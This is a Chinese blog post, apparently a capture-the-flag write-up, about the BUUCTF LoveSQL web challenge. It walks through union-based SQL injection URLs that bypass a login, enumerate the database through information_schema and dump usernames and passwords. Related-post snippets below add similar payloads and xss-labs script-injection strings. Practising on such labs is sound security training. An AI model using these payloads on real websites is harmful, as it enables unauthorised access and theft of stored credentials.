[极客大挑战 2019]LoveSQL

最新推荐文章于 2025-04-03 18:51:07 发布
最新推荐文章于 2025-04-03 18:51:07 发布
阅读量2.6k 收藏
点赞数
分类专栏: web 文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52671379/article/details/122553636
版权

[极客大挑战 2019]LoveSQL

在这里插入图片描述

注入过程及思路

首先进行万能密码测试

/check.php?username=1' or 1=1 #&password=1

在这里插入图片描述
发现存在注入
接着查显位点

/check.php?username=admin' order by 4 #&password=1

在这里插入图片描述
当字段数为4时,页面回显错误,使用union查询回显点位:

/check.php?username=aa' union select 0,1,2#&password=1

得到显位点

在这里插入图片描述爆破库

/check.php?username=aa' union select 0,1,database()#&password=1

得到库名"geek"
在这里插入图片描述
爆破表

/check.php?username=aa' union select 0,1,group_concat(table_name) from information_schema.tables where table_schema=database() --+

表:geekuser,l0ve1ysq1
在这里插入图片描述

爆字段:

/check.php?username=aa' union select 0,1,group_concat(column_name) from information_schema.columns where table_name='geekuser' --+

字段:id,username,password
在这里插入图片描述

爆用户:

/check.php?username=aa' union select 0,1,group_concat(username) from geekuser #

geekuser 表中并无flag flag在l0ve1ysq1表中
在这里插入图片描述在这里插入图片描述

爆密码:

/check.php?username=aa' union select 0,1,group_concat(password) from l0ve1ysq1 #

也可以:

/check.php?username=aa' union select 0,1,group_concat(username,0x3a,password) from l0ve1ysq1 #

#0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ':' ,用以分割pasword和username。

在这里插入图片描述

BUUCTF__[极客挑战 2019]LoveSQL_题解
风过江南乱的博客
06-19 1356
前言 很好,考完了死亡高数和物,虽然还没考完,不过艰难的已经过去了,感觉神清气爽,水一题。 u1s1,线上考试=在海里考试。 读题 嗯,还是熟悉的背景图,好几题都是这个师傅出的sql注入。 首先很容易试出为单引号字符型闭合,输入 1、1"、1’ , 在1’时报错 然后尝试注入,发现,好像没有过滤,连 union 联合注入都能使用,并且很容易得到数据库名称,得到数据库名称geek 但在此之前,先得到列数为3,不是3则提示报错 然后,基本操作得到表信息,有两个表geekuser和l0ve1ysq
BUUCTF系列 // [极客挑战 2019] LoveSQL
qq_45805420的博客
10-03 762
前言 本题知识点:SQL注入 WP (这题居然是个连续剧。。。 ) 首先尝试使用上一题的解法绕过看看(上一题 WP 的 传送门),结果如下: 注意到密码有些奇怪,尝试着用 MD5 解码失败,也没啥思路(最后事实证明确实也用不到这玩意),故回到 SQL 注入上面来寻找突破 1、查询字段数 ...?username=admin'order by 列数#&password=123 // #号需要手动进行 URL 编码即替换成 %23 可知共有3个字段 2、测试注入点 接着使用联合查询寻找注入点即回显
buuctf-[极客挑战 2019]LoveSQL
2301_81574836的博客
02-19 470
buuctf-[极客挑战 2019]LoveSQL题解
[极客挑战 2019]LoveSQL1
jamesP777的博客
07-23 773
这是一道比较标准的SQL注入题目,首先打开靶机,看到登录页,输入用户名、密码。首先试一下单引号,成功触发,说明是通过单引号闭合,发现SQL语句报错,我们把注释符换成#号,成功登入 这里我想偷懒,用堆叠注入,失败 ?username=admin';show databases;#此路不通,用联合查询判断原始查询的列数 ?username=admin' UNION select NULL,NULL,NULL# 当输入3个NULL时成功,原始查询有3列。接下来把admin替换掉(因为刚好数据库中存在admin
[极客挑战 2019]LoveSQL1 解题思路
m0_59527104的博客
12-20 1182
这里就拿到了flag:flag{d4876f3e-545c-4e11-ac6c-af2d372935d4}可以看到登录成功,输出密码,这里试了试md5,但是密码得不到我们要的flag。拿到该数据库下的表名称,这里猜测这个表:l0ve1ysq1可能藏着我们需要的信息。拿到数据库名称:geek。
BUUCTF WEB 极客挑战 2019 LoveSQL
Ethan552525的博客
07-27 638
题目: 解题: 1:输入万能密码 用户名:admin' or 1=1# 密 码:1 2:确定回显列 用户名:1' union select 1,2,3;# (select 1,2...逐步增加,直到不报错即得到正确的列数) 密 码:1 说明查询列数为3,回显列为2,3。 UNION 操作符用于合并两个或多个 SELECT 语句的结果集。 ...
BUUCTF[极客挑战 2019]LoveSQL
2302_78972359的博客
05-01 374
单引号时有回显,双引号时提示WRONG,所以是单引号注入。得到一个password,登录admin用户也回显这个页面,没发现这个password有啥特别作用。得到两个表名geekuser和l0ve1ysq1,根据题目名字,最先怀疑它,先爆第二个表的字段。当输入4时回显Unkonwn column,说明该表有三个字段,查一下三个字段。根据题目提示,考察SQL注入,看一下是单引号注入还是双引号,输入。第三个字段是password,我们在用户名输入,进行联合爆表。先查一下表内有几个字段。
[极客挑战 2019]LoveSQL全网最详细WP
最新发布
siyue_secret的博客
04-03 157
是为了让union前的查询错误,查不到结果,避免影响union后查询数据库名的显示。照理来说,我们需要逐个测试当前查询的表是哪个表,但是此处。看起来像flag的东西出来了,往右拖动页面可以看到真正的flag值。按照ctf的做题经验,应该先爆这个表。(6)爆username和password的值。(5)然后爆l0ve1ysq1表中的字段名。尝试使用union注入,一步一步来。此时可以看到页面正常显示,没有报错。由页面返回的信息可知,数据库名为。(4)然后爆geek数据库中的表。即按照第一列的值对结果排序,
[极客挑战 2019]LoveSQL 1
xixixihan的博客
11-23 372
sql题练习
极客挑战2019LoveSQL解题
Bird&Bird
10-25 2618
1、打开靶机:BUUCTF在线评测,选择web---->【极客挑战2019LoveSQL 打开被测试站点,是这个样子的,是上一题EasySQL的延续。 2、EasySQL那道题采用万能密码,我们也直接使用万能密码试一下,结果如下: 直接给出了密码。 使用正确的用户名和密码登录一下,结果还是 那使用MD5库碰撞一下,结果也没碰撞出来。 3、继续寻常注入吧。 爆破有多少列(字段数) username=admin&password=6ec1cab79005129..
buuctf刷题 [极客挑战 2019]LoveSQL
2301_79697181的博客
11-29 395
爆字段:0' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema = database() and table_name='l0ve1ysq1'#爆表:0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
【学习笔记 25】 buu [极客挑战 2019]LoveSQL
weixin_43553654的博客
07-27 428
0x00 知识点 1.利用常用万能密码登录 2.利用union构造联合注入得到flag 0x01 解题思路 1.打开网站,映入眼帘的就是一个登录界面,并且网页头上有一行小字,说是不让用sqlmap跑,那我偏要试试,但是现在还找不到注入点,继续进行,等下再试。这时在查看源码时发现验证的check.php页面和get的传参方式,直接访问check.php网页什么重要信息都没,那继续回到原网页利用常用的万能密码进行登录测试。 这里用到的是 用户名:admin'/* 密 码:*/' 登录成功。 发现被蓝色圈圈出
BUUCTF[极客挑战 2019]LoveSQL1
weixin_53955759的博客
06-18 296
这一题和easysql页面一样
Upload-labs
qq_52671379的博客
04-01 4762
Upload-labs
buuctf [网鼎杯 2020 玄武组]SSRFMe
qq_52671379的博客
04-23 3878
buuctf [网鼎杯 2020 玄武组]SSRFMe
buuctf [第三章 web进阶]Python里的SSRF
qq_52671379的博客
04-21 3170
buuctf [第三章 web进阶]Python里的SSRF
xss-labs通关技巧
qq_52671379的博客
04-25 2947
第一关 标签注入 <script>alert(1)</script> 没有任何防护措施 第二关 我们输入的数据,是在表单中的value属性内,所以需要先闭合input标签 "><script>alert(1)</script> 法二: 闭合value属性,然后在input标签内加入事件属性 " οnclick="alert(1) 查看源码: 在h2标签中有.htmlspecialchars(str),所以在该地方虽然有回显我们的恶意代码,但是不能x
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值